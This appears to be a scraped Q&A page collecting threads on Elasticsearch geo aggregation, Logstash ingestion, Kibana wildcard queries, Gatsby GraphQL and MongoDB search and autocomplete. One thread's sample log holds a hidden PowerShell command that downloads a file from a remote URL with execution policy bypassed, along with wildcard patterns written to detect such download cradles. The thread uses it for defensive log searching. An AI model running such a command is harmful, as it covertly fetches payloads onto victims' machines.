Using Elastic Search Geo Functionality To Find Most Common Locations?

Using Elastic Search Geo Functionality To Find Most Common Locations? - amazon-web-services

I have a geojson file containing a list of locations each with a longitude, latitude and timestamp. Note the longitudes and latitudes are multiplied by 10000000.
{
"locations" : [ {
"timestampMs" : "1461820561530",
"latitudeE7" : -378107308,
"longitudeE7" : 1449654070,
"accuracy" : 35,
"junk_i_want_to_save_but_ignore" : [ { .. } ]
}, {
"timestampMs" : "1461820455813",
"latitudeE7" : -378107279,
"longitudeE7" : 1449673809,
"accuracy" : 33
}, {
"timestampMs" : "1461820281089",
"latitudeE7" : -378105184,
"longitudeE7" : 1449254023,
"accuracy" : 35
}, {
"timestampMs" : "1461820155814",
"latitudeE7" : -378177434,
"longitudeE7" : 1429653949,
"accuracy" : 34
}
..
Many of these locations will be the same physical location (e.g. the user's home) but obviously the longitude and latitudes may not be exactly the same.
I would like to use Elastic Search and it's Geo functionality to produce a ranked list of most common locations where locations are deemed to be the same if they are within, say, 100m of each other?
For each common location I'd also like the list of all timestamps they were at that location if possible!
I'd very much appreciate a sample query to get me started!
Many thanks in advance.

In order to make it work you need to modify your mapping like this:
PUT /locations
{
"mappings": {
"location": {
"properties": {
"location": {
"type": "geo_point"
},
"timestampMs": {
"type": "long"
},
"accuracy": {
"type": "long"
}
}
}
}
}
Then, when you index your documents, you need to divide the latitude and longitude by 10000000, and index like this:
PUT /locations/location/1
{
"timestampMs": "1461820561530",
"location": {
"lat": -37.8103308,
"lon": 14.4967407
},
"accuracy": 35
}
Finally, your search query below...
POST /locations/location/_search
{
"aggregations": {
"zoomedInView": {
"filter": {
"geo_bounding_box": {
"location": {
"top_left": "-37, 14",
"bottom_right": "-38, 15"
}
}
},
"aggregations": {
"zoom1": {
"geohash_grid": {
"field": "location",
"precision": 6
},
"aggs": {
"ts": {
"date_histogram": {
"field": "timestampMs",
"interval": "15m",
"format": "DDD yyyy-MM-dd HH:mm"
}
}
}
}
}
}
}
}
...will yield the following result:
{
"aggregations": {
"zoomedInView": {
"doc_count": 1,
"zoom1": {
"buckets": [
{
"key": "k362cu",
"doc_count": 1,
"ts": {
"buckets": [
{
"key_as_string": "Thu 2016-04-28 05:15",
"key": 1461820500000,
"doc_count": 1
}
]
}
}
]
}
}
}
}
UPDATE
According to our discussion, here is a solution that could work for you. Using Logstash, you can call your API and retrieve the big JSON document (using the http_poller input), extract/transform all locations and sink them to Elasticsearch (with the elasticsearch output) very easily.
Here is how it goes in order to format each event as depicted in my initial answer.
Using http_poller you can retrieve the JSON locations (note that I've set the polling interval to 1 day, but you can change that to some other value, or simply run Logstash manually each time you want to retrieve the locations)
Then we split the locations array into individual events
Then we divide the latitude/longitude fields by 10,000,000 to get proper coordinates
We also need to clean it up a bit by moving and removing some fields
Finally, we just send each event to Elasticsearch
Logstash configuration locations.conf:
input {
http_poller {
urls => {
get_locations => {
method => get
url => "http://your_api.com/locations.json"
headers => {
Accept => "application/json"
}
}
}
request_timeout => 60
interval => 86400000
codec => "json"
}
}
filter {
split {
field => "locations"
}
ruby {
code => "
event['location'] = {
'lat' => event['locations']['latitudeE7'] / 10000000.0,
'lon' => event['locations']['longitudeE7'] / 10000000.0
}
"
}
mutate {
add_field => {
"timestampMs" => "%{[locations][timestampMs]}"
"accuracy" => "%{[locations][accuracy]}"
"junk_i_want_to_save_but_ignore" => "%{[locations][junk_i_want_to_save_but_ignore]}"
}
remove_field => [
"locations", "#timestamp", "#version"
]
}
}
output {
elasticsearch {
hosts => ["localhost:9200"]
index => "locations"
document_type => "location"
}
}
You can then run with the following command:
bin/logstash -f locations.conf
When that has run, you can launch your search query and you should get what you expect.

Related

AWS ElasticSearch Query for Keyword not getting results I expect

I have an ElasticSearch query that looks like:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"Message.keyword": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"Message.keyword": "*system.net.webclient).downloadfile(*"
}
}
]
}
}
}
}
}
And a Doc in my Index that includes:
message:Engine state is changed from None to Available. Details: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.18362.628 HostId=3dd1a50a-cc15-45e0-bf63-4456d556fb67 HostApplication=powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download EngineVersion=5.1.18362.628 RunspaceId=de762b62-056c-4be1-90bf-a12cfe6fbc72
As you can see above it includes:
(New-Object System.Net.WebClient).DownloadFile('https:....
It seems like the filter here should be matching the message, but when I execute the Query through Kibana, nothing matches even though I can see the doc above inside my index through Kibana UI if I just query for *.
I think maybe this is because the query above is querying for Message.keyword? How do I get it to successfully hit the document above?
Edit:
mapping: https://pastebin.com/cWN4jF3d
Sample data: https://pastebin.com/SyErqaG8

There are two reasons for the query not returning the result:
The field name in mapping is message whereas in query you are using Message.
A field with keyword datatype index the data as it is. This means it will be case sensitive as well. The document you shared has text System.Net.WebClient).DownloadFile( where you can see that there are characters with upper case whereas the search query you expect to match "*system.net.webclient).downloadfile(*" has all lower case characters.
Therefore the query should be:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"message.keyword": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"message.keyword": "*System.Net.WebClient).DownloadFile(*"
}
}
]
}
}
}
}
}

The keyword fields are used only for exact match. You will need to match the regular fields if you only want to match a substring / subset of the string, by querying on Message instead of Message.keyword:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"Message": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"Message": "*system.net.webclient).downloadfile(*"
}
}
]
}
}
}
}
}

error in graphQL using imageSharp regex with gatsby

I'm using gatsby to create a simple blog. When I try to search for an specific image, I get an error from graphql. I have the following configs:
installed "gatsby-image": "^1.0.55"
graphql`
query MainLayoutQuery {
heroImage: imageSharp(id: { regex: "/hero.jpg/" }) {
id
sizes(quality: 100) {
base64
tracedSVG
aspectRatio
src
srcSet
srcWebp
srcSetWebp
sizes
originalImg
originalName
}
}
}
`
when I run that query in graphql ui I get:
{
"errors": [
{
"message": "Cannot read property 'id' of undefined",
"locations": [
{
"line": 31,
"column": 3
}
],
"path": [
"heroImage"
]
}
],
"data": {
"heroImage": null
}
}
But, if I run the same query without the regex, it works fine:
{
heroImage: imageSharp {
id
sizes(quality: 100) {
base64
tracedSVG
aspectRatio
src
srcSet
srcWebp
srcSetWebp
sizes
originalImg
originalName
}
}
}
Of course, it brings the first image it has access to
"data": {
"heroImage": {
"id": "/Users/marcosrios/dev/workspace/atravesando-todo-limite/src/posts/2018-08-25-tengo-miedo/cover.png absPath of file >> ImageSharp"
}
}

Which version of Gatsby are you using? If v2 you need to edit your query as there has been changes:
https://next.gatsbyjs.org/docs/migrating-from-v1-to-v2/#dont-query-nodes-by-id
Your query then would look like that:
graphql`
query MainLayoutQuery {
heroImage: imageSharp(fluid: { originalName: { regex: "/hero.jpg/" } }) {
id
fluid(quality: 100) {
base64
tracedSVG
aspectRatio
src
srcSet
srcWebp
srcSetWebp
sizes
originalImg
originalName
}
}
}
`

How to search "\....\" using regexp in elasticsearch

In my indexed data, I am having some documents which are having values like this -
"exclude y:\dkj....\sdfisd\sdfsdf\asdfai"
My requirement is to search all the documents having such entries based on "\....\". So for this I am using "regexp".
Currently I have used below regular expression for this, but it didn't worked out for me -
".*\\(\.\.\.\.)\\.*"
".*?[\.]{4}.*"
".*\\[\.]{4}\\.*"
Below is the part of my query which I am firing to elasticsearch.
"bool" : {
"must" : [ {
"query_string" : {
"query" : "\"DC2\"",
"default_field" : "COLLECTOR_NAME"
}
}, {
"regexp" : {
"RAW_EVENT_DATA" : {
"value" : ".*?[\\.]{4}.*",
"flags_value" : 0
}
}
} ]
}
Please provide some suggestions.

Usually it is related to analyzer
Let us create type with following mapping
{
"my_index": {
"mappings": {
"test": {
"properties": {
"title": {
"type": "string"
},
"title_raw": {
"type": "string",
"index": "not_analyzed"
}
}
}
}
}
}
Add new document
POST my_index/test/1
{
"title":"exclude y:\\dkj....\\sdfisd\\sdfsdf\\asdfai",
"title_raw":"exclude y:\\dkj....\\sdfisd\\sdfsdf\\asdfai"
}
Now search it
POST my_index/test/_search
{
"query": {
"regexp" : {
"title" : {
"value" : ".*?[\\.]{4}.*",
"flags_value" : 0
}
}
}
returns empty result
But not analysed field works perfect with regexp
POST my_index/test/_search
{
"query": {
"regexp" : {
"title_raw" : {
"value" : ".*?[\\.]{4}.*",
"flags_value" : 0
}
}
}
You can check documentation to get an idea why it is happening. Because you are using standard analyzer part of information is lost on indexing stage and not available during search.

MongoDB Search and Sort, with Number of Matches and Exact Match

I want to create a small MongoDB Search Query where I want to sort the result set based exact match followed by no. of matches.
For eg. if I have following labels
Physics
11th-Physics
JEE-IIT-Physics
Physics-Physics
Then, if I search for "Physics" it should sort as
Physics
Physics-Physics
11th-Physics
JEE-IIT-Physics

Looking for the sort of "scoring" you are talking about here is an excercise in "imperfect solutions". In this case, the "best fit" here starts with "text search", and "imperfect" is the term to consider first when working with the text search capabilties of MongoDB.
MongoDB is "not" a dedicated "text search" product, nor is it ( like most databases ) trying to be one. Full capabilites of "text search" is reserved for dedicated products that do that as there area of expertise. So maybe not the best fit, but "text search" is given as an option for those who can live with the limitations and don't want to implement another engine. Or Yet! At least.
With that said, let's look at what you can do with the data sample as given. First set up some data in a collection:
db.junk.insert([
{ "data": "Physics" },
{ "data": "11th-Physics" },
{ "data": "JEE-IIT-Physics" },
{ "data": "Physics-Physics" },
{ "data": "Something Unrelated" }
])
Then of course to "enable" the text search capabilties, then you need to index at least one of the fields in the document with the "text" index type:
db.junk.createIndex({ "data": "text" })
Now that is "ready to go", let's have a look at a first basic query:
db.junk.find(
{ "$text": { "$search": "\"Physics\"" } },
{ "score": { "$meta": "textScore" } }
).sort({ "score": { "$meta": "textScore" } })
That is going to give results like this:
{
"_id" : ObjectId("55af83b964876554be823f33"),
"data" : "Physics-Physics",
"score" : 1.5
}
{
"_id" : ObjectId("55af83b964876554be823f30"),
"data" : "Physics",
"score" : 1
}
{
"_id" : ObjectId("55af83b964876554be823f31"),
"data" : "11th-Physics",
"score" : 0.75
}
{
"_id" : ObjectId("55af83b964876554be823f32"),
"data" : "JEE-IIT-Physics",
"score" : 0.6666666666666666
}
So that is "close" to your desired result, but of course there is no "exact match" component. In addition, the logic here used by the text search capabilities with the $text operator means that "Physics-Physics" is the preferred match here.
This is because then engine does not recognize "non words" such as the "hyphen" in between. To it, the word "Physics" appears several times in the indexed content for the document, therefore it has a higher score.
Now the rest of your logic here depends on the application of "exact match" and what you mean by that. If you are looking for "Physics" in the string and "not" surrounded by "hyphens" or other characters then the following does not suit. But you can just match a field "value" that is "exactly" just "Physics":
db.junk.aggregate([
{ "$match": {
"$text": { "$search": "Physics" }
}},
{ "$project": {
"data": 1,
"score": {
"$add": [
{ "$meta": "textScore" },
{ "$cond": [
{ "$eq": [ "$data", "Physics" ] },
10,
0
]}
]
}
}},
{ "$sort": { "score": -1 } }
])
And that will give you a result that both looks at the "textScore" produced by the engine and then applies some math with a logical test. In this case where the "data" is exactly equal to "Physics" then we "weight" the score by an additional factor using $add:
{
"_id": ObjectId("55af83b964876554be823f30"),
"data" : "Physics",
"score" : 11
}
{
"_id" : ObjectId("55af83b964876554be823f33"),
"data" : "Physics-Physics",
"score" : 1.5
}
{
"_id" : ObjectId("55af83b964876554be823f31"),
"data" : "11th-Physics",
"score" : 0.75
}
{
"_id" : ObjectId("55af83b964876554be823f32"),
"data" : "JEE-IIT-Physics",
"score" : 0.6666666666666666
}
That is what the aggregation framework can do for you, by allowing manipulation of the returned data with additional conditions. The end result is passed to the $sort stage ( notice it is reversed in descending order ) to allow that new value to be to sorting key.
But the aggregation framework can really only deal with "exact matches" like this on strings. There is no facility at present to deal with regular expression matches or index positions in strings that return a meaningful value for projection. Not even a logical match. And the $regex operation is only used to "filter" in queries, so not of use here.
So if you were looking for something in a "phrase" thats was a bit more invovled than a "string equals" exact match, then the other option is using mapReduce.
This is another "imperfect" approach as the limitations of the mapReduce command mean that the "textScore" from such a query by the engine is "completely gone". While the actual documents will be selected correctly, the inherrent "ranking data" is not available to the engine. This is a by-product of how MongoDB "projects" the "score" into the document in the first place, and "projection" is not a feature available to mapReduce.
But you can "play with" the strings using JavaScript, as in my "imperfect" sample:
db.junk.mapReduce(
function() {
var _id = this._id,
score = 0;
delete this._id;
score += this.data.indexOf(search);
score += this.data.lastIndexOf(search);
emit({ "score": score, "id": _id }, this);
},
function() {},
{
"out": { "inline": 1 },
"query": { "$text": { "$search": "Physics" } },
"scope": { "search": "Physics" }
}
)
Which gives results like this:
{
"_id" : {
"score" : 0,
"id" : ObjectId("55af83b964876554be823f30")
},
"value" : {
"data" : "Physics"
}
},
{
"_id" : {
"score" : 8,
"id" : ObjectId("55af83b964876554be823f33")
},
"value" : {
"data" : "Physics-Physics"
}
},
{
"_id" : {
"score" : 10,
"id" : ObjectId("55af83b964876554be823f31")
},
"value" : {
"data" : "11th-Physics"
}
},
{
"_id" : {
"score" : 16,
"id" : ObjectId("55af83b964876554be823f32")
},
"value" : {
"data" : "JEE-IIT-Physics"
}
}
My own "silly little algorithm" here is basically taking both the "first" and "last" index position of the matched string here and adding them together to produce a score. It's likely not what you really want, but the point is that if you can code your logic in JavaScript, then you can throw it at the engine to produce the desired "ranking".
The only real "trick" here to remember is that the "score" must be the "preceeding" part of the grouping "key" here, and that if including the orginal document _id value then that composite key part must be renamed, otherwise the _id will take precedence of order.
This is just part of mapReduce where as an "optimization" all output "key" values are sorted in "ascending order" before being processed by the reducer. Which of course does nothing here since we are not "aggregating", but just using the JavaScript runner and document reshaping of mapReduce in general.
So the overall note is, those are the available options. None of them perfect, but you might be able to live with them or even just "accept" the default engine result.
If you want more then look at external "dedicated" text search products, which would be better suited.
Side Note: The $text searches here are preferred over $regex because they can use an index. A "non-anchored" regular expression ( without the caret ^ ) cannot use an index optimally with MongoDB. Therefore the $text searches are generally going to be a better base for finding "words" within a phrase.

One more way is using the $indexOfCp aggregation operator to get the index of matched string and then apply sort on the indexed field
Data insertion
db.junk.insert([
{ "data": "Physics" },
{ "data": "11th-Physics" },
{ "data": "JEE-IIT-Physics" },
{ "data": "Physics-Physics" },
{ "data": "Something Unrelated" }
])
Query
const data = "Physics";
db.junk.aggregate([
{ "$match": { "data": { "$regex": data, "$options": "i" }}},
{ "$addFields": { "score": { "$indexOfCP": [{ "$toLower": "$data" }, { "$toLower": data }]}}},
{ "$sort": { "score": 1 }}
])
Here you can test the output
[
{
"_id": ObjectId("5a934e000102030405000000"),
"data": "Physics",
"score": 0
},
{
"_id": ObjectId("5a934e000102030405000003"),
"data": "Physics-Physics",
"score": 0
},
{
"_id": ObjectId("5a934e000102030405000001"),
"data": "11th-Physics",
"score": 5
},
{
"_id": ObjectId("5a934e000102030405000002"),
"data": "JEE-IIT-Physics",
"score": 8
}
]

Implement auto-complete feature using MongoDB search

I have a MongoDB collection of documents of the form
{
"id": 42,
"title": "candy can",
"description": "canada candy canteen",
"brand": "cannister candid",
"manufacturer": "candle canvas"
}
I need to implement auto-complete feature based on the input search term by matching in the fields except id. For example, if the input term is can, then I should return all matching words in the document as
{ hints: ["candy", "can", "canada", "canteen", ...]
I looked at this question but it didn't help. I also tried searching how to do regex search in multiple fields and extract matching tokens, or extracting matching tokens in a MongoDB text search but couldn't find any help.

tl;dr
There is no easy solution for what you want, since normal queries can't modify the fields they return. There is a solution (using the below mapReduce inline instead of doing an output to a collection), but except for very small databases, it is not possible to do this in realtime.
The problem
As written, a normal query can't really modify the fields it returns. But there are other problems. If you want to do a regex search in halfway decent time, you would have to index all fields, which would need a disproportional amount of RAM for that feature. If you wouldn't index all fields, a regex search would cause a collection scan, which means that every document would have to be loaded from disk, which would take too much time for autocompletion to be convenient. Furthermore, multiple simultaneous users requesting autocompletion would create considerable load on the backend.
The solution
The problem is quite similar to one I have already answered: We need to extract every word out of multiple fields, remove the stop words and save the remaining words together with a link to the respective document(s) the word was found in a collection. Now, for getting an autocompletion list, we simply query the indexed word list.
Step 1: Use a map/reduce job to extract the words
db.yourCollection.mapReduce(
// Map function
function() {
// We need to save this in a local var as per scoping problems
var document = this;
// You need to expand this according to your needs
var stopwords = ["the","this","and","or"];
for(var prop in document) {
// We are only interested in strings and explicitly not in _id
if(prop === "_id" || typeof document[prop] !== 'string') {
continue
}
(document[prop]).split(" ").forEach(
function(word){
// You might want to adjust this to your needs
var cleaned = word.replace(/[;,.]/g,"")
if(
// We neither want stopwords...
stopwords.indexOf(cleaned) > -1 ||
// ...nor string which would evaluate to numbers
!(isNaN(parseInt(cleaned))) ||
!(isNaN(parseFloat(cleaned)))
) {
return
}
emit(cleaned,document._id)
}
)
}
},
// Reduce function
function(k,v){
// Kind of ugly, but works.
// Improvements more than welcome!
var values = { 'documents': []};
v.forEach(
function(vs){
if(values.documents.indexOf(vs)>-1){
return
}
values.documents.push(vs)
}
)
return values
},
{
// We need this for two reasons...
finalize:
function(key,reducedValue){
// First, we ensure that each resulting document
// has the documents field in order to unify access
var finalValue = {documents:[]}
// Second, we ensure that each document is unique in said field
if(reducedValue.documents) {
// We filter the existing documents array
finalValue.documents = reducedValue.documents.filter(
function(item,pos,self){
// The default return value
var loc = -1;
for(var i=0;i<self.length;i++){
// We have to do it this way since indexOf only works with primitives
if(self[i].valueOf() === item.valueOf()){
// We have found the value of the current item...
loc = i;
//... so we are done for now
break
}
}
// If the location we found equals the position of item, they are equal
// If it isn't equal, we have a duplicate
return loc === pos;
}
);
} else {
finalValue.documents.push(reducedValue)
}
// We have sanitized our data, now we can return it
return finalValue
},
// Our result are written to a collection called "words"
out: "words"
}
)
Running this mapReduce against your example would result in db.words look like this:
{ "_id" : "can", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "canada", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "candid", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "candle", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "candy", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "cannister", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "canteen", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "canvas", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
Note that the individual words are the _id of the documents. The _id field is indexed automatically by MongoDB. Since indices are tried to be kept in RAM, we can do a few tricks to both speed up autocompletion and reduce the load put to the server.
Step 2: Query for autocompletion
For autocompletion, we only need the words, without the links to the documents.
Since the words are indexed, we use a covered query – a query answered only from the index, which usually resides in RAM.
To stick with your example, we would use the following query to get the candidates for autocompletion:
db.words.find({_id:/^can/},{_id:1})
which gives us the result
{ "_id" : "can" }
{ "_id" : "canada" }
{ "_id" : "candid" }
{ "_id" : "candle" }
{ "_id" : "candy" }
{ "_id" : "cannister" }
{ "_id" : "canteen" }
{ "_id" : "canvas" }
Using the .explain() method, we can verify that this query uses only the index.
{
"cursor" : "BtreeCursor _id_",
"isMultiKey" : false,
"n" : 8,
"nscannedObjects" : 0,
"nscanned" : 8,
"nscannedObjectsAllPlans" : 0,
"nscannedAllPlans" : 8,
"scanAndOrder" : false,
"indexOnly" : true,
"nYields" : 0,
"nChunkSkips" : 0,
"millis" : 0,
"indexBounds" : {
"_id" : [
[
"can",
"cao"
],
[
/^can/,
/^can/
]
]
},
"server" : "32a63f87666f:27017",
"filterSet" : false
}
Note the indexOnly:true field.
Step 3: Query the actual document
Albeit we will have to do two queries to get the actual document, since we speed up the overall process, the user experience should be well enough.
Step 3.1: Get the document of the words collection
When the user selects a choice of the autocompletion, we have to query the complete document of words in order to find the documents where the word chosen for autocompletion originated from.
db.words.find({_id:"canteen"})
which would result in a document like this:
{ "_id" : "canteen", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
Step 3.2: Get the actual document
With that document, we can now either show a page with search results or, like in this case, redirect to the actual document which you can get by:
db.yourCollection.find({_id:ObjectId("553e435f20e6afc4b8aa0efb")})
Notes
While this approach may seem complicated at first (well, the mapReduce is a bit), it is actual pretty easy conceptually. Basically, you are trading real time results (which you won't have anyway unless you spend a lot of RAM) for speed. Imho, that's a good deal. In order to make the rather costly mapReduce phase more efficient, implementing Incremental mapReduce could be an approach – improving my admittedly hacked mapReduce might well be another.
Last but not least, this way is a rather ugly hack altogether. You might want to dig into elasticsearch or lucene. Those products imho are much, much more suited for what you want.

Thanks to #Markus solution, I came up with something similar with aggregations instead. Knowing that map-reduce are flagged as deprecated for later versions.
const { MongoDBNamespace, Collection } = require('mongodb')
//.replace(/(\b(\w{1,3})\b(\W|$))/g,'').split(/\s+/).join(' ')
const routine = `function (text) {
const stopwords = ['the', 'this', 'and', 'or', 'id']
text = text.replace(new RegExp('\\b(' + stopwords.join('|') + ')\\b', 'g'), '')
text = text.replace(/[;,.]/g, ' ').trim()
return text.toLowerCase()
}`
// If the pipeline includes the $out operator, aggregate() returns an empty cursor.
const agg = [
{
$match: {
a: true,
d: false,
},
},
{
$project: {
title: 1,
desc: 1,
},
},
{
$replaceWith: {
_id: '$_id',
text: {
$concat: ['$title', ' ', '$desc'],
},
},
},
{
$addFields: {
cleaned: {
$function: {
body: routine,
args: ['$text'],
lang: 'js',
},
},
},
},
{
$replaceWith: {
_id: '$_id',
text: {
$trim: {
input: '$cleaned',
},
},
},
},
{
$project: {
words: {
$split: ['$text', ' '],
},
qt: {
$const: 1,
},
},
},
{
$unwind: {
path: '$words',
includeArrayIndex: 'id',
preserveNullAndEmptyArrays: true,
},
},
{
$group: {
_id: '$words',
docs: {
$addToSet: '$_id',
},
weight: {
$sum: '$qt',
},
},
},
{
$sort: {
weight: -1,
},
},
{
$limit: 100,
},
{
$out: {
db: 'listings_db',
coll: 'words',
},
},
]
// Closure for db instance only
/**
*
* #param { MongoDBNamespace } db
*/
module.exports = function (db) {
/** #type { Collection } */
let collection
/**
* Runs the aggregation pipeline
* #return {Promise}
*/
this.refreshKeywords = async function () {
collection = db.collection('listing')
// .toArray() to trigger the aggregation
// it returns an empty curson so it's fine
return await collection.aggregate(agg).toArray()
}
}
Please check for very minimal changes for your convenience.

We Keep Coding

c++ django amazon-web-services regex python-2.7 google-cloud-platform list unit-testing opengl ember.js

Using Elastic Search Geo Functionality To Find Most Common Locations? - amazon-web-services

Related

AWS ElasticSearch Query for Keyword not getting results I expect

error in graphQL using imageSharp regex with gatsby

How to search "\....\" using regexp in elasticsearch

MongoDB Search and Sort, with Number of Matches and Exact Match

Implement auto-complete feature using MongoDB search

Categories

Resources